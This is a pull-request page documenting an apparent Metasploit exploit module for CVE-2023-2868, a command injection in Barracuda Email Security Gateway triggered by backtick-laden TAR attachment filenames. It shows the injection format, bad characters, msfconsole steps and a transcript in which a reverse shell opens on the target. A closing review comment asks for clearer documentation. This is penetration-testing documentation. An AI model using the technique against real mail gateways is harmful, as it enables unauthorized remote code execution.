Merge pull request #21033 from Alpenlol/barracuda-esg-cve-2023-2868
Add exploit for CVE-2023-2868 Barracuda ESG command injection
@@ -0,0 +1,113 @@
## Vulnerable Application

This module exploits CVE-2023-2868, a command injection vulnerability in
Barracuda Email Security Gateway (ESG) appliances running firmware versions
prior to the May 2023 security patch.

The vulnerability exists in how the ESG processes TAR file attachments in
incoming emails. When extracting TAR archives, filenames are passed directly
to shell commands without proper sanitization. An attacker can craft a TAR
file with a filename containing shell metacharacters (specifically backticks)
to achieve remote command execution.

### Affected Versions

- Barracuda ESG firmware versions 5.1.3.001 through 9.2.0.006 (prior to May 2023 patch)
- All ESG appliance models processing email with attachment scanning enabled

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/smtp/barracuda_esg_tarfile_rce`
3. `set RHOSTS <target_ip>`
4. `set MAILTO <target_email>`
5. `set LHOST <your_ip>`
6. `run`
7. Wait 30-90 seconds for the ESG to process the email attachment

## Options

### MAILTO

The target email address that the ESG appliance is configured to receive mail for. This email will trigger the attachment processing.

### MAILFROM

The sender email address. Can be set to any valid email format. Default: `scanner@example.com`.

### SUBJECT

The email subject line. Default: `Quarterly Report`.

### BODY

Optional email body text. If not specified, a random alphanumeric string is generated.

### FILENAME

Optional TAR attachment filename. If not specified, a random filename with `.tar` extension is generated.

## Scenarios

### Barracuda ESG 9.2.0.001

```
msf6 > use exploit/linux/smtp/barracuda_esg_tarfile_rce
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set MAILTO admin@target.local
MAILTO => admin@target.local
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > check

[*] 192.168.1.100:25 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.100:25 - Barracuda ESG detected in SMTP banner
msf6 exploit(linux/smtp/barracuda_esg_tarfile_rce) > run

[*] Generating malicious TAR with payload filename
[*] Composing email with TAR attachment
[*] Sending exploit email to admin@target.local via 192.168.1.100:25
[+] Email sent successfully
[*] Payload will execute when ESG processes the attachment
[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:54321)

id
uid=604(scana) gid=604(scana) groups=604(scana)
hostname
barracuda300.lol.tst
```

## Technical Details

### Exploit Mechanism

1. A malicious TAR archive is created with a filename in the format: `` '`COMMAND`' ``
2. The TAR is attached to an email and sent to the target ESG via SMTP
3. When the ESG processes the email attachment, it extracts the TAR
4. The vulnerable code passes the filename to a shell command without sanitization
5. The backticks trigger command substitution, executing the attacker's command

### Character Restrictions

The TAR filename cannot contain:
- Single quotes (`'`) - breaks the outer quoting
- Backticks (`` ` ``) - breaks the command substitution boundaries
- Null bytes (`\x00`) - truncates the filename
- Newlines (`\r\n`) - breaks TAR format

These are declared as `BadChars` in the module, so the framework will automatically filter incompatible payloads.

### Artifacts

This exploit creates the following artifacts on the target system:
- Email and attachment in mail processing queue/logs
- Process entries for shell and payload processes
- Temporary files if using netcat payloads (e.g., mkfifo pipe in `/tmp/`)

## References

- [CVE-2023-2868](https://nvd.nist.gov/vuln/detail/CVE-2023-2868)
- [Barracuda Security Advisory](https://www.barracuda.com/company/legal/esg-vulnerability)
- [Mandiant Analysis](https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally)
- [AttackerKB](https://attackerkb.com/topics/NCRbE1IDJP/cve-2023-2868)
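Review bot: the Character Restrictions section lists the bytes the TAR filename may not contain, but the document never states how long the injected command may be, even though the Exploit Mechanism section says the entire payload is carried inside the archive filename; please document the length limit the module enforces (or the TAR name format it emits) so users understand why a chosen payload can be rejected. In the same list, the entry `Newlines (\r\n) - breaks TAR format` should say whether `\r` and `\n` are each excluded as single bytes, since `BadChars` is matched per byte, and the stated reason should describe what actually breaks (the injected command line rather than the archive format). Separately, the Scenarios transcript shows `check` reporting only `Barracuda ESG detected in SMTP banner`; the Verification Steps should state that the check fingerprints the product from the banner and cannot determine whether the May 2023 patch is applied, so a detected result is not confirmation that the appliance is vulnerable.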